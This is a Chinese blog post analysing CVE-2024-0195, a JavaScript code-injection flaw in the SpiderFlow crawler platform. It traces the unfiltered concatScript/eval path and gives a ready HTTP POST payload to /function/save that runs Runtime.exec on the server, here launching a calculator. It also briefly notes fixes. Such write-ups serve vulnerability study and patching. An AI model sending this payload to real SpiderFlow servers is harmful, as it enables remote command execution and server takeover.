SpiderFlow爬虫平台漏洞利用分析(CVE-2024-0195)

1. 漏洞介绍

SpiderFlow爬虫平台项目中

spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionNameparametersscript 中的内容,从而构造恶意输入来执行任意的 JavaScript 代码,从而导致代码注入,并允许远程发起攻击,可导致服务器失陷。

2. 流程图分析

3. 搭建过程

1. IDEA Gitee 快速搭建

URL : gitee.com/jmxd/spider...

2. 数据库搭建

我这里使用的是MySQL5.7,然后使用Navicat运行项目中spider-flow\db\spiderflow.sql这个SQL文件会在数据库中自动生成所需要的数据库:

3. 数据库连接

然后修改数据库配置文件application.properties,路径为:spider-flow\spider-flow-web\src\main\resources\application.properties

4. 运行

spider-flow\spider-flow-web\src\main\java\org\spiderflow\SpiderApplication.java

然后访问路径[http://localhost:8088/](http://localhost:8088/),成功搭建!

4. 利用过程

首先我们直接在IDEA中寻找危险函数eval,使用Ctrl+shift+F文件搜索:

发现这里有个validScript函数调用了eval危险函数:

arduino 复制代码
    public static void validScript(String functionName,String parameters,String script) throws Exception {        new ScriptEngineManager().getEngineByName("nashorn").eval(concatScript(functionName,parameters,script));    }

然后这里的我们去看看eval具体执行的参数是怎么生成的:

typescript 复制代码
    private static String concatScript(String functionName,String parameters,String script){        StringBuffer scriptBuffer = new StringBuffer();        scriptBuffer.append("function ")                .append(functionName)                .append("(")                .append(parameters == null ? "" : parameters)                .append("){")                .append(script)                .append("}");        return scriptBuffer.toString();    }

可以看到concatScript 方法中,它接受三个参数 functionNameparametersscript,然后将它们拼接成一个 JavaScript 函数的字符串。这里它没有任何的过滤。所以我们可以尝试构造恶意的这三个参数实现RCE。

帮助网安学习,全套资料S信领取:

① 网安学习成长路径思维导图

② 60+网安经典常用工具包

③ 100+SRC漏洞分析报告

④ 150+网安攻防实战技术电子书

⑤ 最权威CISSP 认证考试指南+题库

⑥ 超1800页CTF实战技巧手册

⑦ 最新网安大厂面试题合集(含答案)

⑧ APP客户端安全检测指南(安卓+IOS)

在上面的函数中将产生如下的字符串:

javascript 复制代码
function functionName(parameters){script}

很明显我们可以构造恶意的script来导致RCE:

例如script的值可以为}Java.type('java.lang.Runtime').getRuntime().exec('calc');{

这样的话我们最终的字符串将会变成:

bash 复制代码
function functionName(parameters){}Java.type('java.lang.Runtime').getRuntime().exec('calc');{}

然后最后在执行的时候就会直接定义一个函数后执行我们的Java恶意代码。

然后我们分析是哪个函数调用了validScript函数

scss 复制代码
    public String saveFunction(Function entity) {        try {            ScriptManager.validScript(entity.getName(),entity.getParameter(),entity.getScript());            super.saveOrUpdate(entity);            init();            return null;        } catch (Exception e) {            logger.error("保存自定义函数出错",e);            return ExceptionUtils.getStackTrace(e);        }    }

然后在FunctionController.java调用了saveFunction

typescript 复制代码
@RestController@RequestMapping("/function")public class FunctionController {    ......    @RequestMapping("/save")    public String save(Function function){        return functionService.saveFunction(function);    }    ......}

然后我们现在就可以去实际的功能点看需要哪些参数:

于是我们直接写出payload:

bash 复制代码
POST /function/save HTTP/1.1Content-Length: 38Content-Type: application/x-www-form-urlencoded; charset=UTF-8Host: localhost:8088​id=&name=rce&parameter=rce&script=}Java.type('java.lang.Runtime').getRuntime().exec('calc');{

成功命令执行弹出计算器:

修复方式

  • 过滤好script参数

  • 设置沙箱

5. 总结

这个项目在Gitee上面有7.4K的Star,有3.6K的fork记录,在实际部署上也不是很少,但是漏洞点出的不是很难主要是思路扩展,适宜入门。

相关推荐
IT_陈寒2 小时前
Vite的热更新突然不香了,排查三小时差点砸键盘
前端·人工智能·后端
子兮曰2 小时前
Agency-Agents 深度解析:400+ AI 专家的"梦之队"如何重塑开发工作流
前端·后端·vibecoding
竹林8183 小时前
用 The Graph 查询链上数据实战:从手搓 RPC 到 Subgraph,我的 NFT 项目数据加载快了 10 倍
前端·javascript
妙码生花3 小时前
从 PHP 到 AI + Golang,程序员自救转型手记(十九):点选验证码代码逐行目检
前端·后端·go
Awu12274 小时前
⚡从零开发 Agent CLI(五)实现一个可治理、可扩展的工具系统
前端·人工智能·claude
咪库咪库咪4 小时前
Vue3-生命周期
前端
莪_幻尘5 小时前
你的 AI Skill 越多越蠢?Token 上下文爆炸的求生指南
前端·ai编程
lichenyang4535 小时前
从 has.echo 到异步 API 注册表:一次 ASCF API 回调不触发的排查复盘
前端
林瞅瞅5 小时前
Nuxt3 项目部署 Nginx 防盗链后特定 JS 文件 403 问题修复方案
前端
kyriewen6 小时前
别再每次都 Google 了:我整理了前端日常最常踩的 10 个 Git 坑,附速查表
前端·javascript·git